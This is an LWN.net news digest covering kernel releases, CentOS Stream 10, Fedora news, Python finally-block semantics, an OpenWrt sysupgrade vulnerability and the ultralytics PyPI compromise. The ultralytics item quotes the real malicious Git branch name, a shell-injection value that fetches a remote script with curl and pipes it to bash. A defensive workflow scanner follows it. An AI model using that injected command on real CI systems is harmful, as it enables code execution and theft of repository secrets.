Linux Weekly News
Security updates for Thursday
[$] LWN.net Weekly Edition for December 12, 2024
[$] A look at CentOS Stream 10
The Red Hat Enterprise Linux (RHEL) 10 beta was released in mid-November and, if all goes according to plan, CentOS Stream 10 should be released before the end of the year. While nothing is etched in stone just yet, it is a good time for anyone using or targeting RHEL (and its clones) to start taking a look at how Stream 10, and the corresponding EPEL repository, is shaping up. This is not only important to RHEL and Stream users, but anyone deploying and supporting software on enterprise Linux (EL) derivatives like AlmaLinux, Oracle Linux, and Rocky Linux as well.
Stable kernel 6.6.65 fixes two regressions
Greg Kroah-Hartman has released version 6.6.65 of the kernel:
This release only fixes a build regression for openrisc, and a runtime regression for domU guests. If you don't have problems with them, no need to upgrade.
[$] Auto-tuning the kernel
The Linux kernel has many tunable parameters. While there is much advice available on the internet about how to set them, few people have the time to wade through the (often contradictory) explanations and choose appropriate values. One possible way to address this is a project called bpftune, a program that uses BPF to track various metrics about a running system and adjust the sysctl knobs appropriately. The program is developed by Oracle, and is available under a GPLv2 license. Bpftune is currently mostly focused on optimizing network settings, but the authors hope that the system is flexible enough to be extended to cover other settings.
Security updates for Wednesday
Systemd 257 released
A change of hats! (Fedora Magazine)
Fedora Project Leader (FPL) Matthew Miller writes that he will soon be hanging up the FPL hat:
Stay tuned for a job posting from Red Hat, and details about all that. I'm hoping we can hire someone awesome early in 2025, and make the official handover on the release of auspiciously-numbered Fedora Linux 42.
I'm not going to leave Fedora, though. As I said above, although it might not always feel like it from the outside, Red Hat support for Fedora is stronger than ever, and I plan on helping that grow even more. I'm stepping into a full-time management role in the Community Linux Engineering organization, so Fedora will still be part of my day job, just in a different way.
[$] A Zephyr-based camera trap for seagrass monitoring
GNU Shepherd 1.0.0 released
This 1.0.0 release is published today because we think Shepherd has become a solid tool, meeting user experience standards one has come to expect since systemd changed the game of free init systems and service managers alike. It's also a major milestone for Guix, which has been relying on the Shepherd from a time when doing so counted as dogfooding.
Security updates for Tuesday
Fedora Steering Council election interviews
When the Fedora Engineering Steering Council (FESCo) is up for election, the project posts interviews of the candidates in order to help Fedora contributors make an informed choice. This year, the candidates are Zbigniew Jędrzejewski-Szmek, Tomáš Hrčka, Josh Stone, David Cantrell, Fabio Alessandro Locati, and Kevin Fenzi. All of them except for Locati are current members of the steering council. Voting is open until December 20.
[$] Finally continuing the discussion over continue in finally
In 2019, the Python community had a lengthy discussion about changing the rules (that some find counterintuitive) on using break, continue, or return statements in finally blocks. These are all ways of jumping out of a finally block, which can interrupt the handling of a raised exception. At the time, the Python developers chose not to change things, because the consensus was that the existing behavior was not a problem. Now, after a report put together by Irit Katriel, the project is once again considering changing the language.
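The behavior under discussion, as an added example (not code from the article or from the Python discussion): a return or continue in a finally block silently discards the exception that was being raised, and the third function shows the same loop with the error path made explicit.

```python
def return_in_finally():
    """The ValueError raised in the try body never reaches the caller."""
    try:
        raise ValueError("lost")
    finally:
        return "cleanup done"  # return in finally discards the in-flight exception


def continue_in_finally(items):
    """Every error raised while handling an item is silently dropped by the continue."""
    seen = []
    for item in items:
        try:
            if item == "bad":
                raise ValueError(item)
            seen.append(item)
        finally:
            continue  # jumps to the next iteration; the exception is discarded
    return seen


def continue_explicit(items):
    """Same loop with the error path visible: errors are recorded, cleanup still runs."""
    seen, errors, cleanups = [], [], 0
    for item in items:
        try:
            if item == "bad":
                raise ValueError(item)
            seen.append(item)
        except ValueError as exc:
            errors.append(str(exc))  # the error is handled where it can be seen
            continue  # continue in except, not finally: nothing is swallowed
        finally:
            cleanups += 1  # finally does cleanup only, no control flow
    return seen, errors, cleanups
```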
A vulnerability in the OpenWrt attended sysupgrade server
For a detailed description of how the exploit works, see this blog post.
Then, as the hash collision occurred, the server returns the overwritten build artifact to the legitimate request that requests the following packages. [...]
By abusing this, an attacker could force the user to upgrade to the malicious firmware, which could lead to the compromise of the device.
Two new stable kernels
Kernel prepatch 6.13-rc2
Security updates for Monday
Abusing Git branch names to compromise a PyPI package
A compromised release was uploaded to PyPI after a project automatically processed a pull request with a flawed script. The GitHub account "OpenIM Robot" (which appears to be controlled by Xinwei Xiong) opened a pull request for the ultralytics Python package. The pull request included a suspicious Git branch name:
openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)
Unfortunately, ultralytics uses the pull_request_target GitHub Action trigger to automate some of its continuous-integration tasks. This runs a script from the base branch of the repository, which has access to the repository's secrets — but that script was vulnerable to a shell injection attack from the branch name of the pull request. The injected script appears to have used the credentials it had access to in order to compromise a later release uploaded to PyPI to include a cryptocurrency miner. It is hard to be sure of the details, because GitHub has already removed the malicious script.
This problem has been known for several years, but this event may serve as a good reminder to be careful with automated access to important secrets.
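A check for the pattern behind this incident, written here as an added example rather than code from ultralytics or GitHub: a small scanner that flags workflow expressions under the pull-request author's control (such as github.head_ref; the list is illustrative and the exact expression ultralytics expanded is an assumption) when they are expanded inside a run: script, where the text becomes part of the shell command, but not when they are passed through env:, where the shell receives them as data. The two workflow fragments are constructed to show the weak form beside the hardened one.

```python
import re

# Expression contexts a pull-request author controls (illustrative list, not exhaustive).
UNTRUSTED = re.compile(
    r"\$\{\{\s*(?:github\.head_ref"
    r"|github\.event\.pull_request\.(?:title|body|head\.ref|head\.label))\s*\}\}"
)
RUN_KEY = re.compile(r"(-\s+)?run:(\s|$)")


def find_run_injections(workflow_text):
    """Return [(line_no, expression)] for untrusted expressions expanded inside run: scripts."""
    findings, in_run, run_indent = [], False, 0
    for no, line in enumerate(workflow_text.splitlines(), 1):
        stripped = line.lstrip()
        indent = len(line) - len(stripped)
        if in_run and stripped and indent <= run_indent:
            in_run = False  # the run: block scalar has ended
        m = RUN_KEY.match(stripped)
        if m:
            in_run = True
            run_indent = indent + len(m.group(1) or "")  # indent of the "run" key itself
        if in_run:
            findings.extend((no, e.group(0)) for e in UNTRUSTED.finditer(line))
    return findings


# Constructed workflow fragments: the weak pattern beside the hardened one.
VULNERABLE = """\
on: pull_request_target
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - run: |
          echo "Checking branch ${{ github.head_ref }}"
          ./ci.sh
"""

HARDENED = """\
on: pull_request_target
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - env:
          PR_HEAD_REF: ${{ github.head_ref }}
        run: |
          echo "Checking branch $PR_HEAD_REF"
          ./ci.sh
"""
```

Run over VULNERABLE the scanner reports line 7; over HARDENED it reports nothing, because the only expansion happens in env: and the script quotes the variable.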
A single stable kernel to fix boot problems
Greg Kroah-Hartman released version 6.12.3 of the kernel to fix a regression that can cause some machines to fail to boot on version 6.12.2. The other stable branches are continuing on their normal cadence, with 6.12.4-rc1 and 6.6.64-rc1 starting review today.